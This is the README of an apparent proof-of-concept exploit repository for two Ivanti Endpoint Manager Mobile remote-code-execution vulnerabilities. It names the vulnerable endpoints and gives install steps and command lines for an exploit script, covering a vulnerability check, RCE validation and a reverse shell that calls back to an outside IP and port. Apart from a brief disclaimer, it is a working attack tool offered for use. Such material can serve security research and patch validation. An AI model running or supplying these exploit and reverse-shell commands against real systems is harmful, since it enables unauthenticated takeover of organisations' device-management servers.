
Proof of Concept for CVE-2026-1281 & CVE-2026-1340 - Ivanti EPMM Pre-Auth RCE via Bash Arithmetic Expansion
⚠️ DISCLAIMER: This PoC is provided solely for educational and security research purposes. Unauthorized use is illegal.
Complete Proof of Concept (PoC) for exploiting the CVE-2026-1281 and CVE-2026-1340 vulnerabilities affecting Ivanti Endpoint Manager Mobile (EPMM). These vulnerabilities allow unauthenticated remote code execution (RCE) via a Bash Arithmetic Expansion mechanism.
/mifs/c/appstore/fob/ endpoint/mifs/c/aftstore/fob/ endpointgit clone https://github.com/MehdiLeDeaut/CVE-2026-1281-Ivanti-EPMM-RCE.git
cd CVE-2026-1281-Ivanti-EPMM-RCE
pip3 install -r requirements.txt
chmod +x *.py
# Vulnerability test
python3 exploit.py -t https://target.com -c
# RCE validation
python3 exploit.py -t https://target.com --test-rce
# Reverse shell
python3 exploit.py -t https://target.com --reverse-shell 10.10.14.5:4444
Mehdi Le Deaut - Cybersecurity Consultant | Red Team Specialist
This project is licensed under the MIT License - see the LICENSE file for details.